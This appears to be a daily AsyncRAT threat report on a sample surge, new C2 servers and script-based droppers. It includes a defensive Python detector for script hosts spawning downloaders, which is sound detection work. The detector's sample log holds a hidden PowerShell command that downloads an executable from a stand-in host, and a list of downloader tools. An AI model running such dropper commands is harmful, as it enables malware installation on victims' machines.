AsyncRAT - Daily Threat Report

Thursday, April 16, 2026

Daily Summary

New AsyncRAT samples rose 50% above the 7-day average, a significant surge in activity. The spike is accompanied by a substantial expansion of command-and-control (C2) infrastructure: 100 new servers were identified today.

New Samples Detected

The sample set is dominated by executable files (.exe), comprising 11 of the 15 new samples. A notable shift is the presence of scripting payloads (.bat, .js, .vbs), which together make up over a quarter of today’s detections. This suggests attackers are using script-based droppers to download or deploy the final RAT binary.

Distribution Methods

The file type mix points to a multi-stage delivery strategy. The scripting files (.js, .vbs) are most likely delivered as phishing attachments or malicious downloads; when a user opens them, the Windows Script Host (wscript.exe or cscript.exe) runs them, and the script fetches and launches the .exe payload. The .bat files, run through cmd.exe, may serve the same first-stage role or be used after initial access to disable security controls before the RAT is installed.

Detection Rate

Current variants show moderate detection rates across aggregate AV engines. The new scripting components, particularly the .js and .vbs files, score lower, indicating these initial delivery vectors are more likely to slip past signature-based defenses than the final .exe payload is.

C2 Infrastructure

The addition of 100 new C2 servers represents a major infrastructure rollout, far exceeding the typical daily volume. This scale suggests preparation for a large-scale campaign or the migration to fresh infrastructure to evade takedowns. No clear geographic pattern is evident from the new server data.

7-Day Trend

Today’s sharp increase in both samples and C2 servers breaks a period of relatively steady activity observed over the past week, signaling a potential new campaign initiation.

Security Analysis

The current activity mirrors the pattern of large-scale, commodity AsyncRAT campaigns targeting broad victim sets rather than precision attacks. The non-obvious tactic is the use of simple, often overlooked scripting formats (.vbs, .js, .bat) as the first stage, which sidesteps controls focused on executable files. Defenders should prioritize logging and monitoring for wscript.exe, cscript.exe and cmd.exe executing scripts from user-writable locations (Downloads, Desktop, user or system temp folders), and for those interpreters spawning network-capable tools such as powershell.exe, curl.exe, certutil.exe or bitsadmin.exe, since that parent-child chain is where a dropper fetches the RAT binary. Where business workflows allow, reassociating .js and .vbs files with a text editor instead of the script host removes the double-click path entirely.
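As an added example (not code from this report or its data sources), the following Python implements the two detection points described in the Distribution Methods and Security Analysis sections: a script host launched with a .js/.vbs/.bat file from a user-writable directory, and a script host spawning a network-capable downloader. It runs over constructed, Sysmon-style process-creation events reduced to four fields; the log layout, sample paths, hostnames and rule names are assumptions for illustration.

```python
"""Flag first-stage script execution patterns from process-creation events.

Added example, not from the report. The sample events, the pid|ppid|image|cmdline
layout and the rule names are constructed assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Interpreters for the first-stage file types called out in the report.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".bat", ".cmd")
# Living-off-the-land binaries a dropper commonly uses to fetch the RAT .exe.
DOWNLOADERS = {"powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe",
               "bitsadmin.exe", "mshta.exe"}
# User-writable paths a phished user typically launches an attachment from.
USER_PATH = re.compile(
    r"^[a-z]:\\(?:users\\[^\\]+\\(?:downloads|desktop|appdata\\local\\temp)"
    r"|windows\\temp)\\", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# Constructed sample events (assumed layout: pid|ppid|image|cmdline).
SAMPLE_LOG = r"""
100|1|C:\Windows\explorer.exe|C:\Windows\Explorer.EXE
200|100|C:\Windows\System32\wscript.exe|"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice_0416.js"
300|200|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "iwr http://example.invalid/up -OutFile $env:TEMP\up.exe"
400|1|C:\Windows\System32\cscript.exe|cscript.exe //nologo C:\ProgramData\Vendor\inventory.vbs
500|100|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\bob\AppData\Local\Temp\setup.bat
"""


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the pipe-delimited sample layout into ProcEvent records."""
    events = []
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(int(pid), int(ppid), image, cmdline))
    return events


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def script_paths(cmdline: str) -> list[str]:
    """Command-line tokens that look like script files, with quotes stripped
    so paths containing spaces survive intact."""
    tokens = [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]
    return [t for t in tokens if t.lower().endswith(SCRIPT_EXTS)]


def detect(events: list[ProcEvent]) -> list[dict]:
    """Return one finding per matched rule; benign events produce nothing."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        # Rule 1: a script host running a script that lives in a user-writable
        # directory, the first-stage pattern the report describes.
        if name in SCRIPT_HOSTS:
            for path in script_paths(e.cmdline):
                if USER_PATH.match(path):
                    findings.append({"pid": e.pid,
                                     "rule": "script_from_user_dir",
                                     "detail": path})
        # Rule 2: a script host spawning a network-capable LOLBin, the step
        # where a .js/.vbs dropper fetches the .exe payload.
        parent = by_pid.get(e.ppid)
        if parent and basename(parent.image) in SCRIPT_HOSTS and name in DOWNLOADERS:
            findings.append({"pid": e.pid,
                             "rule": "script_spawned_downloader",
                             "detail": f"{basename(parent.image)} -> {name}"})
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"pid={f['pid']:<4} {f['rule']:<26} {f['detail']}")
```

The vendor inventory script under C:\ProgramData is deliberately left unflagged: the point of Rule 1 is the launch location, not the interpreter itself, which keeps the rule usable in environments that run legitimate logon scripts. In a real deployment the same two rules map directly onto Sysmon Event ID 1 (Image, ParentImage, CommandLine) or Windows Security Event 4688 with command-line auditing enabled.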

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)